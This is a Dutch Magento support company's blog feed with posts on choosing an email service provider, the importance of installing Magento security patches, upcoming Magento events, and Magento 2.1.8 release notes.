    Om dit digitale bos van E-mail Service Providers (ESP) weer overzichtelijk te maken heeft SupportDesk een onderzoek gedaan naar het aanbod van deze tools. Dit onderzoek kwam voort nadat een van onze klanten om hulp vroeg bij het zoeken naar de ESP die het beste aansloot op diverse markt- en bedrijfsspecifieke wensen. Met succes heeft SupportDesk hier een passend advies op kunnen geven.

    Wat is een E-mail Service Provider (ESP)?

    Een E-mail Service Provider is de schakel tussen de verzender en ontvanger van een e-mail. De ESP zorgt ervoor dat jouw e-mails, zoals bijvoorbeeld nieuwsbrieven, correct arriveren bij de ontvanger. Onder correct arriveren verstaan we dat deze goed te lezen zijn in alle browsers en smartphones en vaak verkleinen ze de kans dat ze terecht komen in een “spambox”. Ook op het gebied van “business analytics” kan een ESP een steentje bijdragen. Inzicht in hoeveel mensen de e-mail hebben geopend, wie heeft doorgeklikt en naar welk onderdeel van jouw website wordt helder gepresenteerd. De effectiviteit van jouw e-mail campagnes en inzicht in je doelgroepen zijn hiermee goed in kaart te brengen.

    Het kiezen van de juiste Magento E-mail Service Provider (ESP)

    De moeilijkste vraag voor velen is dus met welke ESP je in zee dient te gaan. Er zijn onderhand zoveel E-mail Service Providers voor het Magento platform (56, alleen al op de Magento Marketplace) dat het een grote uitdaging is om juist die ene ESP eruit te pikken die het beste past bij jouw Magento shop.

    Om deze vraag makkelijker te kunnen beantwoorden is het van belang goed te bedenken wat je precies zoekt in een E-mail Service Provider. Door dit goed in kaart te brengen bespaar je jezelf veel tijd met zoeken en vergroot je de kans op een beter aansluitende ESP. Het proces van de zoektocht naar de beste Email Service Provider bestaat, kernachtig, uit drie stappen:

    1. Het bepalen en vormgeven van jouw e-mail marketing ambities

    Je hebt al een globaal idee in je hoofd maar je doet er goed aan hier iets langer bij stil te staan. Op het moment dat jij je e-mail ambities gaat concretiseren en deze een plek gaat geven in de organisatie krijg je een duidelijker beeld van wat je precies in een ESP zoekt. Waar wil je e-mail marketing voor inzetten, wie is er verantwoordelijk, hoeveel technische kennis is er in huis, wat mag het kosten, hoe richt ik mijn e-mail marketingproces in? Dit zijn enkele vragen die je inzichtelijk wilt krijgen alvorens je aan een zoektocht begint.

    2. Verzamelen en wegfilteren van E-mail service providers

    Nu je al jouw wensen en ambities in kaart hebt gebracht is het tijd om te ESP’s te verzamelen en deze te filteren. Alle ESP’s (300+) zijn te vinden op deze link. Het filteren is echter een meer tijdrovend onderdeel. SupportDesk heeft hiervoor de E-mail Service Providers gesegmenteerd waardoor er snel te filteren is op wensen die onder andere “aanwezig / niet aanwezig” zijn en “simpel / uitgebreid”. De onderwerpen van de segmentaties zijn ook zeker te gebruiken als vragen bij het vormgeven van de e-mail marketing ambities.

    Onderstaand een greep van de vragen en functies die wij hebben gebruikt om de E-mail Marketing Services te segmenteren.

    E-mail Service Provider (ESP) voor Magento 1.x of Magento 2.x?

    Dat de ESP aansluit op jouw platform is natuurlijk vereiste nummer één. Immers, niet elke E-mail service provider ondersteund beide platformen. Als je momenteel een Magento 1 shop hebt kun je deze vraag ook toekomstgericht stellen: Stap ik binnenkort over naar Magento 2 en wil ik dat mijn E-mail Service Provider Magento 2 Ready is? Hier rekening mee houden kan veel geld en moeite besparen in de toekomst.

    E-mail Service Provider (ESP) Integratie met Magento transactionele e-mails?

    Transactionele e-mails zijn e-mails die (automatisch) verstuurd worden nadat er door de klant in je webshop een actie is uitgevoerd. Deze actie, bijvoorbeeld een bestelling, zorgt voor een verzending van een orderbevestiging, factuur, creditnota of een verzendingsbevestiging in opvolging van de bestelling. Niet alleen acties voortvloeiend uit bestellingen maar ook aan- en afmeldingen van een nieuwsbrief en voorraad statussen behoren tot de opties. Een ESP die deze integratie ondersteund kan, onder andere, de volgende voordelen opleveren:

    • personaliseren van transactionele e-mails
    • Meer bereik doordat minder e-mails in de spamfilter belanden
    • Makkelijker beheren en aanpassingen doen
    • Meer statistieken om jouw business te sturen

    Kanttekening: De bovenstaande opties zijn (deels) ook mogelijk in Magento. Echter vergt dit veel meer technische kennis, development werk en tijd.

    E-mail Service Provider (ESP) segmentatie opties

    Segmentatie opties zijn de opties die je binnen de E-mail Service Provider hebt om je klanten te filteren en te categoriseren, zoals bestedingsgrootte, regio en leeftijd. Dit geeft je de mogelijkheid gerichter je klanten te kunnen benaderen met e-mailcampagnes. Heeft jouw e-business grote baat bij geavanceerde klantsegmentaties? Kijk dan goed naar de segmentatieopties.

    E-mail Service Provider (ESP) Campagne functies

    Sommige webshops gebruiken een campagne alleen om een maandelijkse nieuwsbrief te versturen, maar je kunt hier natuurlijk nog veel meer mee. Er zijn campagne opties die jouw klanten:

    • Een leuke mail sturen op hun verjaardag
    • Een reminder sturen, bijvoorbeeld 3 maanden na aankoop of tijdens een seizoen
    • (ingelogde) klanten een mail sturen die met een volle winkelwagen jouw website hebben verlaten (Abandoned Cart option)

    Het is dus goed om na te denken over welke opties een toegevoegde waarde hebben voor jouw webshop, deze opties kunnen een grote impact hebben op jouw klant-loyaliteit en tevredenheid. Heb je deze opties niet nodig, dan kun je dus voor een simpelere versie gaan. Scheelt weer in de kosten.

    E-mail Service Provider (ESP) dashboard

    Hecht je veel waarde aan statistieken? Kijk dan goed naar de opties die het dashboard heeft. Zijn dit voor gedefinieerde metrics of heb je ook de opties deze zelf vorm te geven? Vaak is dit gerelateerd met de transactionele e-mail integratie, want hoe meer informatie jij uit je Magento shop kan halen des te meer data je hebt om jouw e-mail marketing te sturen. Meten is weten!

    E-mail Service Provider (ESP) Prijs en voorwaarden

    Last but not least, de prijs. Nu je een hoop ESP’s hebt weg kunnen filteren en nog maar een handjevol van de beste over hebt, kun je prijzen gaan vergelijken. De kosten om een e-mail te sturen kunnen nog weleens verschillen tussen de E-mail Service Providers. Dit is deels omdat de ene ESP groter en uitgebreider is dan de andere maar ook door de verschillende prijsmodellen die ze hanteren, zoals op basis van licenties, modules, CPM (costs per mail) en services.

    3. Pick a winner

    Er blijven een paar ESP’s over die aan al jouw wensen voldoen en vaak is “prijs en voorwaarden” daarna de doorslaggevende factor. Indien mogelijk, vraag een demo aan zodat je de gelegenheid hebt om eerst bekend te raken met de E-mail Service Provider. Als deze daadwerkelijk perfect aansluit en je tot aanschaffen over wilt gaan, probeer eerst te onderhandelen. Hier zit vaak nog wat ruimte in, vooral als je een grote e-maildatabase hebt.

    De zoektocht naar de beste Email Service Provider kan dus flink wat tijd en moeite kosten. Hoe belangrijker e-mail marketing is voor jouw organisatie, hoer meer variabelen er zijn waar je rekening mee dient te houden.

    SupportDesk en Email Service Providers (ESP)

    SupportDesk heeft met het ESP onderzoek veel ESP’s verzameld en diens functionaliteiten gesegmenteerd. Ben je op het moment op zoek naar een Email Service Provider maar zie je door de bomen het bos niet meer? Wil je graag een sparringspartner voor jouw e-mailmarketing ambities en weten welke ESP het beste past bij jouw Magento 1 of Magento 2 shop? neem gerust contact met ons op.

    Om de zoektocht wat makkelijker te maken zal er binnenkort een vervolg komen op deze blog. Hierin zal een selectie van Email Service Providers worden beschreven die, volgens ons, goed uit het onderzoek zijn gekomen en verdere toelichting verdienen.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Waarom zijn Magento Security patches zo belangrijk?

    Magento Security PatchAlweer een nieuwe security patch! Als Magento webshopeigenaar vliegen ze je gemiddeld zo'n 6x per jaar om de oren. Geregeld krijgen wij dan ook de vraag of het wel de energie en geld waard is om óók deze patch weer te moeten installeren.

    Een supergoeie SEO strategie, mobile friendly pages, een nette catalogus en een strak (front-end) design zijn punten die tot de topprioriteiten horen bij menig webshopeigenaar. De Magento security patch blijkt echter een inferieur imago te hebben en komt bij menig webshopeigenaar onderaan de prioriteitenlijst. Omdat de Magento security patch, naar onze mening, hoog in de prioriteitenlijst hoort te staan, willen wij graag wat licht schijnen op dit onderwerp en het belang ervan.

    Wat is een Magento security patch?

    Een Magento security patch is een “digitale” pleister die men op de (digitale) wond van een stuk (Magento) software plakt. De pleister bestaat in dit geval uit een pakket met aangepaste bestanden die één of meerdere beveiligingsproblemen (digitale wonden) moeten verhelpen.

    Termen als “Address Vulnerability In Zend Framework”, “Magento Shoplift bug” en “Remote Code Execution in the Admin panel” passeren regelmatig de revue als je een Magento shop hebt. Hackers worden steeds genuanceerder in het vinden van lekken en zwakheden in het Magento Framework waardoor er een kans bestaat dat ze bij allerlei gegevens kunnen komen. Het team van Magento brengt om deze reden periodiek patches uit om deze lekken en zwakheden te verhelpen.

    is mijn Magento shop veilig?

    Er zijn diverse tools beschikbaar waar jij zelf de veiligheidsstatus van jou Magento shop kan checken. De meest bekende tool is MageReport.com. De tool scant in een mum van tijd jouw Magento shop op heel scala aan onderdelen en geeft dan een risico status aan van "High", "Medium" en "Low". Om een beeld te geven waar men allemaal op dient te letten voor een veilige webshop is hier een gedeelte van de punten waar MageReport allemaal op scant:

    • Security patches: 5344 / 9767 / 9652 / 5994 / 6285 / 6482 / 8788 / 7405 / 6788
    • Brute force attacks
    • SLL protection?
    • EM_Ajaxproducts RCE vulnerability
    • Visbot malware?
    • Unprotected version control?

    De laagdrempeligheid van MageReport heeft ook een nadeel. Kwaadwillende kunnen óók de tool gebruiken om uw Magento shop te scannen op eventuele zwakheden. Ook om deze reden is het tijdig patchen van jouw shop dus van hoog belang.

    Laatste Magento versie

    Wanneer een nieuwe patch uitgebracht is komt Magento niet lang erna ook met een nieuwe versie van het Magento Framework. In deze laatste versie zitten alle patches ingebakken en hoeft u dus, tot Magento met een nieuwe beveiligingsupdate uitkomt, geen patches te installeren. Draait uw shop op een oudere versie van Magento en heeft u nog niet alle beschikbare patches geïnstalleerd? Dan is de kans groot dat er diverse beveiligingslekken zijn.

    Hoe installeer ik Magento securityPatches?

    Zijn er nog digitale pleisters die op jouw Magento shop geplakt moeten worden, dan kun je deze vinden op de Magento Download pagina. Hoewel de stappen voor het installeren van een patch op veel websites redelijk eenduidig staan beschreven (back-up maken, installeren en testen op een ontwikkelomgeving, live zetten), raden wij toch aan dit door een Magento ontwikkelaar te laten doen. In de praktijk loop je vaak tegen uitzonderingen aan en is een Magento ontwikkelaar met technische kennis en ervaring absoluut geen overbodige luxe. Wil je het toch zelf doen? Dan kun je hier lezen hoe dit stapsgewijs moet.

    Magento Patching support van SupportDesk

    SupportDesk is specialist in het leveren van hoogwaardige Magento Support. Als gecertificeerd Magento developer kunnen wij u ondersteunen met al uw Magento 1 & Magento 2 vraagstukken, en zodoende dus ook bij het installeren van patches en het helpen met beveiligingsproblemen.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Aankondiging: MUG top 10 magento 2 extensies

    Magento User Group (MUG)

    Op 12 oktober 2017 om 19:00 is het weer zover. De eerstvolgende Magento User Group (MUG) zal dan georganiseerd worden op het hoofdkantoor van SupportDesk. Ook deze keer beloofd het weer een interessante sessie te worden met deze keer als thema: de top 10 extensie voor Magento 2!

    Voor Magento 1 is al meerdere malen een MUG toegewijd aan de “top 10 extensies”. Afgelopen jaar is er echter een flinke toename geconstateerd van (Magento 1) webshops die naar het Magento 2 platform zijn overgestapt, of willen overstappen. Deze MUG willen we ons dan ook gaan richten op de “top 10 extensies voor Magento 2”. Welke extensies zijn must voor jouw Magento 2 shop en welke moet je met een flinke boog omheen lopen? En zijn er wel Magento 2 extensies beschikbaar die jouw (Nederlandse) markt ondersteunen?

    Dus ben je aan het overwegen over te stappen naar Magento 2, op zoek naar nieuwe extensies, of wil je juist jouw bevindingen over Magento 2 extensies geven? Tijdens deze MUG ben je op het juiste adres! Voorafgaand aan de MUG zal SupportDesk enthousiaste Magento 2 webshopeigenaren benaderen om hun persoonlijke top 10 samen te stellen. Deze zullen tijdens de MUG dan uitgebreid besproken worden.

    Ook zullen we, zoals voorgaand keren, kijken naar waar extensies het meest op beoordeeld worden. Zijn voor jou louter de beoordelingen de doorslaggevende factor, of telt de bereikbaarheid van de developer en diens mogelijkheid om snel issues op te pakken ook mee? Ook voor developers is deze MUG dus een ideale gelegenheid om inzicht te krijgen in de factoren waar mensen extensies op beoordelen.

    Dus ben je een webshopeigenaar, developer, kom je om een extensie aan te prijzen of alleen om te luisteren? Je gaat na deze MUG hoe dan ook met een hoofd bomvol kennis en inspiratie naar huis. Voor iedereen die meer inzicht in de top 10 Magento 2 extensies wilt is dit een must-visit.

    RSVP via deze link

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Meet Magento Belgie 2017 (26 & 27 september)

    Meet Magento Belgie 2017Meet Magento België 2017 (#MMBE17) staat ook bij SupportDesk op de agenda. Dit event zal plaatsvinden op 26 & 27 september in Hotelbloom! te Brussel. Meet Magento België is het grootste en meest innovatieve Magento event in België, de inhoud van de tweedaagse agenda benadrukt dit nog eens.

    26 september 2017 – Contribution Day

    De contributies die vanuit de Magento community komen worden een steeds belangrijker onderdeel voor Magento. Daarom wordt er bij Meet Magento België, en steeds meer andere Meet Magento events, een contribution day georganiseerd. Tijdens deze dag zal, onder leiding van Max Yekaternynenko (Director, Magento Community Engineering) en zijn team, een workshop georganiseerd worden. Deze dag is bedoeld om jouw kennis van Magento 2 te verbreden via praktische sessies. Je zal hier, samen met Magento core architecten, werken aan contributies voor de Magento core.

    27 september- Sessions & networking evening

    Op dinsdag 27 september worden er sessies gehouden. Deze zullen zich, in brede zin, richten op e-commerce en development, verdeeld over de tracks Business en Technology. Er is dus voor zowel Magento webwinkelier als Magento developers veel tips, tricks, tools en kennis te vergaren waarmee jij jouw Magento 1 of Magento 2 shop naar een hoger niveau kunt tillen. Tijdens deze dag zal Ray Bogman (CTO, SupportDesk) uitleggen hoe de Open Source tool Mage.coach de performance van jouw Magento 1 of Magento 2 shop kan verbeteren.

    Networking evening

    vanaf 18:00, aan het einde van de tweede dag, wordt er nog een afsluitende netwerkborrel georganiseerd. Hier kunt u terecht voor een drankje en een hapje. Heeft u de Mage.coach sessie gemist of nog vragen over Magento 1 & Magento 2? Ray Bogman zal ook op de netwerkavond aanwezig zijn om jouw Magento vraagstukken te beantwoorden.

    Tickets voor Meet Magento Belgie zijn hier verkrijgbaar.
    Volg Meet Magento Belgie op Twitter: #MMBE17, en blijf op de hoogte van de laatste ontwikkelingen.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Meet Magento Polen 2017 (18 & 19 september)

    Meet Magento Polen 2017

    De eerstvolgende Meet Magento conferentie zal in Polen worden georganiseerd. Meet Magento Polen (#MM17PL) zal plaatsvinden op 18 & 19 September in het Stara Zajezdnia gebouw te Cracow. Een unieke locatie die voorheen de rol van bierbrouwerij bekleedde, maar nu plaats zal bieden aan meer dan 300 bezoekers en tientallen gastsprekers.

    Meet Magento Polen 2017 Agenda

    De opzet van Meet Magento Polen (#MM17PL) is breder dan wat men normaal zou verwachten van een Meet Magento event. Naast de bekende onderdelen als Keynote sessions, een Business Track en een Technology Track, is er nu ook een Case study Marathon, een Magento E-Commerce Academy en een extra Contribution Day.

    Meet Magento Poland Keynote Sessions

    De Keynote Sessies geven de grote lijnen van Magento ontwikkelingen en de Meet Magento events weer. De Keynote sessies zullen in de ochtend van de eerste dag gehouden worden en in de avond van de laatste dag als afsluiter. De volgende onderdelen zullen hierin naar voren komen:

    • 09:00 tot 09:30 - 18th - Meet Magento Conference opening– Thomas Goletz
    • 09:30 tot 10:00 - 18th- The future of Magento- Ben Marks
    • 10:00 tot 10:30 - 18th- Headless Magento in practice- Michal Wujas & Jamie Maria Schouren
    • 17:00 tot 17:30 - 19th- Meet Magento Conference closure ceremony – Thomas Goletz

    Magento Business Track

    De Business Track richt zich op alle ontwikkelingen die het maximale uit jouw Magento business halen. Met 17 sessies is dit de drukste track en de onderwerpen verspreiden zich dan ook op alle vlakken van Magento Business. Een greep uit het aanbod van sessies is:

    • Measure your Magento Performance with Open Source Mage.CoachRay Bogman
    • Seamless Omnichannel Solutions with Magento Order Management
    • Magento Content Marketing in practice
    • Moving from Magento 1 to Magento 2

    Magento Technology Track

    Een track met veel technische inhoud, die ook meer gericht is op developers en Magento gebruikers die de technologische ontwikkelingen van Magento 1 en Magento 2 willen volgen. Ook in deze track is er geen tekort aan sessies (15). Enkele onderwerpen die hierin naar voren komen zijn:

    • Headless Magento
    • Magento 2 Open Source
    • Magento Security best practices
    • Magento 2 EE: multi node & multi database setup

    Magento E-Commerce Academy

    Deze track vindt alleen plaats op de tweede dag van het event. Er staan 5 sessies op het programma, welke allemaal in het Pools gepresenteerd gaan worden. Er zal gefocust worden op het gehele verkoopproces, order management & kwaliteit van klantenservice en verkoopstrategieën van Magento 2.

    Magento Case study marathon

    Op de eerste dag van Meet Magento Polen (MMPL17) zal er tussen 11:00 en 17:00 negen case studies besproken worden. De onderzoeken strekken zich over verschillende Magento vraagstukken.

    • Bookstore based on Magento 2 and AWS
    • Multistore Magento Enterprise in 2 stores
    • Magento 2 B2B vs Magento 1 B2B
    • Magento 2 transforms chemical industry with B2B E-Commerce

    Magento Contribution Day

    Voor de “Magento Contribution Day” is één extra dag opgezet. Op 17 september, één dag voor de officiele start van Meet Magento Polen (#MM17PL), krijgen developers de kans mee te doen met deze dag. Tijdens deze dag zal Max Yekaternynenko (Manageging Director of Community Engineering) samen met zijn team diverse workshops organiseren, nieuwe inzichten geven in Magento 2 development en laten zien hoe developers hun contributies kunnen doen aan de Magento 2 core en het Magento development team.

    SupportDesk is aanwezig op beide dagen van het event en zal verslag leggen over alle belangrijke Magento ontwikkelingen die hier naar voren komen. Meer informatie over Meet Magento Polen kunt u hier vinden.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Exact meets E-Commerce 2017 (28 september)

    exact-meets-ecommerce-EME17-200
    Op 28 september 2017 zal hét e-commerce event voor Exact software plaatsvinden: Exact meets E-commerce 2017 (#EME17). Een jaarlijks event met verschillende topspelers uit de e-commerce wereld die hun expertise delen op alle vlakken van e-commerce.
    Het betreft een gevarieerd programma met veel sessies en keynotes. Onderwerpen die hierin voorbij zullen komen zijn:

    • Omnichannel
    • B2C/ B2B
    • Clicks&Bricks
    • Magento 2.0

    In dit laatste onderwerp zal SupportDesk een bijdrage leveren. Ray Bogman, (CTO & founder SupportDesk), is Magento specialist en zal in zijn sessie “Magento 2.0 – What’s going on?” licht schijnen op verscheidene Magento onderwerpen als: Biedt Magento 2 wel echt zoveel voordelen als gedacht? Waarom heeft Magento besloten om de ondersteuning van Magento 1 met 18 maanden te verlengen?

    Ook dit jaar staat er, naast e-commerce, een extra thema centraal. Deze keer wordt er extra aandacht geschonken aan “powervrouwen” in de e-commerce wereld. Daarom zal een van de keynote sessies dan ook gehouden worden door niemand anders dan Frederique van der Wal, voormalig supermodel en entrepreneur uit New York. Meer informatie over de sessies kun je hier vinden.

    Voor iedereen die geïnspireerd is geraakt door de gastsprekers maar nog vragen heeft, worden er gedurende de dag ook ronde tafel sessies georganiseerd. Hier kan jij al je vragen stellen. Zo staat er gedurende het event een Magento dokter (Ray Bogman, SupportDesk) paraat, die al jouw vragen over Magento kan beantwoorden, zoals:

    • Exact en Magento
    • Magento 2 Open Source
    • Magento 2 Commerce
    • Magento 2 B2C vs B2B
    • Magento Business Intelligence

    Wil je het Exact meets E-commerce (#EME17) event ook bijwonen, je kan middels deze link jouw tickets regelen.
    Het event zal gehouden worden op het hoofdkantoor van Exact in Delft. Voor meer informatie over de routebeschrijving en parkeermogelijkheden, klik hier.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Magento Commerce 2.1.8 & Magento Open Source (OS) 2.1.8 Release

    magento-upgradeMagento Commerce 2.1.8 & Magento Open Source (OS) 2.1.8 Release

    Donderdag 9 augustus 2017 kwam Magento met een nieuwe release, de Magento Open Source (OS) 2.1.8. en Magento Commerce 2.1.8. Hoewel eigenlijk de release van Magento 2.2 werd verwacht, heeft Magento besloten eerst nog een flink aantal verbeteringen in de Magento 2.1 versie door te voeren.

    De Magento community

    Wat nieuw is in deze release is de zichtbaarheid en erkenning van de grote bijdrage die de Magento Community heeft geleverd. Via het Magento Community Engineering Program kunnen community members fixes insturen die mee worden genomen in de release notes. Van de 100 fixes in de Magento Open Source (OS) 2.1.8 en Magento Commerce 2.1.8 release zijn er 27 ingestuurd door community members. Magento laat hiermee zien hoe belangrijk en betrokken hun community is.
    In de release notes staat achter elke fix van een community member “fix provided by community member @member_name”.

    Magento Open source (OS) 2.1.8 & Magento Commerce 2.1.8 Highlights

    De Magento 2.1.8 release bevat meer dan 100 fixes, verbeteringen en pull requests van de community. In grote lijnen richten deze zich op 4 punten:

    • Meerdere verbeteringen voor het uitrollen aanmaken van statische content
    • Verbeteringen voor Elasticsearch prestaties, indexeren van grote Catalogs, Cache tuning en URL re-writes.
    • Vermindering in de hoeveelheid geheugen die gebruikt wordt bij grote hoeveelheid bewerkingen en Performance optimalisatie.
    • Snellere implementatie van multi-language sites.

    Magento Open source (OS) 2.1.8 & Magento Commerce 2.1.8 reparaties en verbeteringen

    In de volgende onderdelen zijn de verschillende reparaties en verbeteringen doorgevoerd:

    • Catalog
      • Het creëren van aangepaste categorie attributen met een aangepaste afbeelding voor elke categorie.
      • Vertonen van productinformatie na het bewerken en bedienen van één of meer items.
      • Vertonen van aangepaste opties op store view niveau
      • Valuta switcher werkt nu voor widgets op de startpagina
      • Geeft de totale hoeveelheid producten op de categoriepagina nauwkeurig weer
      • Bij het verwijderen van een afbeelding in het admin panel, verwijdert Magento het niet meer op de server
      • Geeft alleen de prijs voor het product op store view niveau
      • Geeft de productafbeelding weer zelfs als “ product_image_white_borders “ niet is ingeschakeld in de “Theme”
      • Het product attribuut “category_ids” heeft enkel een global bereik
      • De “Use Default URL Key” instellingen werken nu ook op store view niveau
      • Geeft de juiste beelden weer wanneer er geschakeld wordt tussen “configurable products” opties.
      • Het vermogen om een “SKU mask” in te stellen naar “leeg”
      • Product opslaan zonder de waarde van de attributen te controleren
      • Magento wijst nu correct afbeeldingen aan gedupliceerde producten toe
    • Checkout
      • Cadeauverpakking optie/selectie verschijnt nu in de winkelwagen
      • Een bestelling voltooien na het invoeren van een nieuw verzendadres tijdens het uitchecken
      • Succesvol definiëren van extensie attributen voor een (quote) factuuradres
    • Configurable products
      • Verwijdert niet meer de “simple products” die geassocieerd zijn met een “configurabel product” als de save knop meer dan één keer wordt geklikt terwijl het configureerbare product wordt opgeslagen
      • Matchen van afbeeldingen met producten
      • Geeft zowel configureerbare als “simple products”, de attribuutwaarden en de zichtbaarheidswaarden weer na als de invoer van een SKU een heel getal is
      • Kleurstalen worden nu vervangen door afbeeldingen op de catalogus- en productpagina’s
    • Import/Export
      • Verbeterde invoer snelheid van geavanceerde prijsstellingsgegevens
      • Exporteert slechts een rij één keer wanneer productinformatie speciale HTML- tekens bevat
      • Importeert klantgegevens zoals verwacht nadat de gegevens de validatiestap voor de invoer zijn doorgekomen
    • Installation and deployment
      • Statische content implementatie (SCD in eng) werkt nu als meerdere talen zijn gespecificeerd
      • Statische content implementatie genereert nu beveiligde content, ongeacht of de inhoud ook veilige of niet-beveiligde URL”s bevat
      • Verplaatst de “sequence_ *” tabel naar de juiste database nadat de splitsing van een database is geïmplementeerd
      • Upgrade Magento 2.0 naar versie Magento 2.1.x wanneer de “auto_increment” instelling in de database groter is dan 1
    • Order management
      • Verbetering van de prestaties van het laden van pagina’s wanneer de bestelpagina veel items bevat
      • Alleen gebruikers met toestemming om een winkel te bekijken kunnen de geplaatste bestelling bekijken of verwerken
      • De aankoopdatum van een bestelling wordt nu weergegeven in de standaard tijdzone van de winkel en is dezelfde datum die wordt weergegeven op de “order creation page
      • Magento produceert niet meer onjuiste URL”s in de site map wanneer de “Use Secure URL’s” in de Admin instellingen is ingesteld op “yes
      • Gratis verzendpromoties zijn niet meer van toepassing nadat u het artikel hebt verwijderd die voor de “gratis verzending” was gekwalificeerd
      • Identificeert de verwerking van een bestelling correct, wanneer deze in een winkel wordt geplaatst, die is geconfigureerd voor meerdere valuta's
    • Payment methods
      • Laat referentietransacties in een andere valuta toe dan de valuta die de vergunning gebruikt
      • Geeft betalingsgegevens weer wanneer u een bestelling van de Magento Admin controleert
      • U kunt nu PayPal Express gebruiken om een bestelling te plaatsen
      • PayPal Express betalingen mislukken niet meer wanneer er voldoende productinventaris is om de bestelling te dekken
    • General Updates
      • Het opnieuw indexeren van veel (1,000,000) klanten gaat nu goed dankzij de “mmap memory allocation” verbeteringen
      • De link “Print Shipping Label” verschijnt nu op de front end bij het product
      • Geeft up-sells op de productpagina weer
      • Verstuurt geen e-mail meer wanneer de “ Disable e-mail communication” is ingesteld op “yes
      • Magento ondersteunt nu negatieve waarden in het veld “Quantity” voor een product
      • Gebruikt het adres sjabloon uit de winkelweergave van de geplaatst order
      • Richtlijnwaarden kunnen nu met aanhalingstekens worden uitgezonderd
      • De validatie van mobiele nummers uit de UK is ge-update
      • Cart Price” regels worden nu toegepast zoals verwacht in de voorwaarden van betalingsmethode
      • Klanten kunnen geen couponcode meer 2x gebruiken
      • Widgets accepteren nu UTF-8 speciale tekens als invoer voor parameters
      • Magento slaat nu een nieuwe productregel op wanneer het SKU attribuut is ingeschakeld voor “Use For Promo Rule Conditions
      • U hoeft de URL-rewites niet meer te verwijderen om Magento te dwingen om links weer te geven na het toevoegen van pagina’s aan de CMS-hiërarchie.
      • Magento front-end scope filters werken nu zoals verwacht
      • De mogelijkheid om “breadcrumbs” te verwijderen zonder de pagina-meta-titel te verwijderen uit de categorieweergave- en productweergavepagina’s
      • Magento uploadt nu de miniatuurafbeeldingen voor e-maillogo’s die worden gebruikt in transactie-e-mails
      • Magento geeft nu afbeeldingen weer zoals verwacht in de productomschrijving
      • Magento heft nu een correcte weergave van gebruikersnamen die langer zijn dan 20 letters
    • Staging
      • Geeft de juiste datum en tijd weer voor “staging updates”. Wanneer de huidige tijd in de zomertijd is en de doeltijd in de standaardtijd, was de doeltijd niet correct
      • Mogelijkheid om een nieuwe geplande update voor een product op te stellen. Bij het maken van een update, vertoonde Magento deze fout: :”Uncaught TypeError: Failed to execute removeChild on Node: parameter 1 is not of type Node”.
      • mogelijkheid om de eindtijd van een actieve update te wijzigen.
      • Het “staging dashboard” laadt nu zonder fout bij het sorteren op status op het dashboard.
      • De weergave/bewerking optie voor een geplande wijziging is nu beschikbaar de gehele duur van de geplande wijziging

    Zo te lezen brengt de Magento 2.1.8 update veel verbeteringen met zich mee.

    Wij raden daarom dan ook onze klanten aan zo spoedig mogelijk te updaten.

    Wij doet dat graag voor u. Mail ons via ons supportaanvraagformulier of bel ons op 020 337 59 61.

    meer info   of   

    Bel nu! 020 337 5961

    Mats van de SeijpDit artikel is geschreven door Mats van de Seijp, onze spin in het web als Support, Ticket Manager, Business Intelligence analyst en Blogger.

    LinkedIn

  • Recap: Magento Live UK 2017 (27 & 28 juni)

    Magento Live UK 17

    Op 27 & 28 Juni vond Magento Live Uk 2017 plaats. Een tweedaags evenement dat in Londen plaatsvond, bij het Park Plaza Westminster Bridge Hotel. SupportDesk heeft voor jou een samenvatting gemaakt van het event zodat jij volledig op de hoogte bent van alle grote ontwikkelingen die dit event met zich meebracht. De volgende ontwikkelingen werden met ons gedeeld:

    • Magento Community Edition (CE) wordt Magento Open Source (OS)
    • Magento Enterprise Editions (EE) wordt Magento Commerce (C)
    • Magento & Google gaan samenwerken
    • Nieuwe Magento B2B mogelijkheden

    Magento Community Edition (CE) en Magento Enterprise Edition (EE) veranderen van naam

    Het gratis platform van Magento, ook wel bekend als Magento Community Edition (CE), wordt hernoemd naar Magento Open Source (OS). Hiermee wilt Magento een statement maken naar de inzet en toewijding die de open source community toevoegd aan het platform. De Magento Enterprise Edition (EE) zal voortaan Magento Commerce (C) genoemd worden.

    Magento gaat samenwerken met Google

    Het grootste nieuws van deze dag was de mededeling dat Magento gaat samenwerken met Google. De samenwerking gaat zich richten op de door-ontwikkeling van Progressive Web Apps (PWA). De reden hiervan is het toenemende gebruik van mobieltjes. 3.1 uur per dag besteed de gemiddelde persoon op zijn of haar telefoon waarvan 87% wordt besteed aan apps en 13 % op het web. De combinatie van het toenemende gebruik van apps en het feit dat deze op het web sneller werken dan mobile pages maken dit interessant.

    Progressive web apps PWA

    Progressive web apps (PWA) is dus anders dan Magento AMP -Accelerated Mobile Pages. Progressive Web Apps zijn meer app gebaseerd en beslaan dan ook meer van diens functionaliteiten. Kort samengevat brengen Progressive web apps de volgende voordelen met zich mee:

    • Magento PWA - Progressive web apps zijn relatief goedkoop in implementatie en onderhoud
    • Magento PWA - Progressive web apps vergen minder opslagruimte voor je mobiel
    • Magento PWA - Progressive web apps hebben een zeer snelle laadtijd
    • Magento PWA - Progressive web apps zorgen voor meer terugkerende bezoekers
    • Magento PWA - Progressive web apps sluiten goed aan met een Magento Headless omgeving voor webshops

